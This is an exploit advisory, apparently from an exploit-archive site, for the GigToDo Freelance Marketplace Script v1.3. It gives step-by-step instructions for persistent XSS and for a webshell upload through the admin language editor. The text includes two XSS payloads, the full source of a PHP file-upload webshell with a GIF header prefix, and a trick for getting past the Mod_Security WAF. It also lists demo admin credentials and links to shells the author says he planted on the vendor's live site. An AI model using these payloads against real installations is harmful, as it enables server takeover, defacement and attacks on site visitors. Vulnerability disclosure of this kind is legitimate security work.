GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload

2019.07.24
ru m0ze (RU) ru
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-434
Dork: -

/*! * # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload * # Google Dork: - * # Date: 2019/07/22 * # Author: m0ze * # Vendor Homepage: https://www.gigtodoscript.com * # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397 * # Version: <= 1.3 * # Tested on: NginX/1.15.10 * # CVE: - * # CWE: CWE-79, CWE-434 */ ::- Details & Description -:: ~ The «GigToDo - Freelance Marketplace Script» web-application is vulnerable to persistent XSS injections and WebShell uploads that allows an attacker to inject JavaScript or HTML code into the front-end or take the full control over the project/server. ::- Demo Website -:: ~ Frontend: https://www.gigtodo.com ~ Backend: https://www.gigtodo.com/admin/login.php ~ Login / Password: patson@gigtodo.com / Pat ::- Special Note -:: ~ Web-application price is $175, 8 Sales. ~ On the demo website you'll face the Mod_Security WAF which is possible to bypass, just read the «Important Stuff» note at the end of this document. There is no guarantee that customers will use some kind of WAF, so entire exploiting process may be much easier. ~ file_put_contents() isn't disabled so this may well be another attack vector. Files https://www.gigtodo.com/m0ze.txt and https://www.gigtodo.com/m0ze.php was created by using this method. ~ Mod_Security WAF can be triggered on <input> tag. To bypass it, simply break the «input» word, f.e.: <in put>. On the front-end use «Developer Console» and merge this HTML tag back to <input>. ::- PoC Links -:: ~ https://www.gigtodo.com/m0ze.txt ~ https://www.gigtodo.com/m0ze.php ~ https://www.gigtodo.com/vh.php ::- PoC [Basic Stuff] -:: ~ First of all we need to create a new language for the front-end here https://www.gigtodo.com/admin/index?insert_language -> for the «Language Title» input field use smth unique and simple (like your handle/nickname but w/o special chars and symbols), for the «Language Image» choose any image u want then press «Insert Language» button. After successful submit there will be .php file with your name inside the https://www.gigtodo.com/languages/ directory (I've used m0ze as a «language name», so my file is https://www.gigtodo.com/languages/m0ze.php). On the https://www.gigtodo.com/admin/index?view_languages page you'll see your «language» for front-end, so press the «Settings» button and you'll see a text editor. That's what we need. ::- PoC [Persistent XSS Injection] -:: ~ For persistent XSS injection u need to add ur payload inside any translation value (check examples below) and then press «Update Language Settings» button. The final step is to activate ur updated file (read the «Important Stuff» below). ~ Example #1: $lang["find_us_on"] = "FIND US ON<img src=https://www.gigtodo.com/images/t5ehiaquEEQ.jpg onload=alert('m0ze')>"; ~ Example #2: $lang["sign_in"] = "Sign In</a><img src=x><a>"; ::- PoC [WebShell Upload] -:: ~ Delete all existed data from ur language file (CTRL + A -> Del) and use this code to create a simple file uploader: GIF89;a <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <style>*{font-family:'Courier New',sans-serif;font-size:14px;color:#ff003b;background-color:black;}</style> </head> <body> <?php echo "<center>File Uploader :: m0ze<br>";echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file2upload'><input type='submit' name='upload' value='Upload'></form></center>";$files = $_FILES['file2upload']['name'];if(isset($_POST['upload'])){if(@copy($_FILES['file2upload']['tmp_name'], $files)){echo "<center>[+] File <b>$files</b> has been uploaded [+]</center>";}else{echo "<center>[-] Upload has failed [-]</center>";}} ?> </body> </html> Make sure that u copy all the code above from «GIF89;a» to «</html>», otherwise u'll face the Mod_Security alert. Press «Update Language Settings» button and u must see the success alert message. The final step is to activate ur updated file (read the «Important Stuff» below) and upload any file u want. ::- PoC [Important Stuff] -:: ~ Keep in mind that code inside ur «language» file WILL NOT WORK UNTILL U ACTIVATE IT. For activation go to the front-end https://www.gigtodo.com and scroll page down, on the right side u'll see the «FIND US ON» text and language select option on the bottom. Select ur «language» from the list and wait until the page reloads. That's it, now ur code up and running.

References:

https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
https://twitter.com/m0ze_ru


See this note in RAW Version
Vote for this issue:
83%
17%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top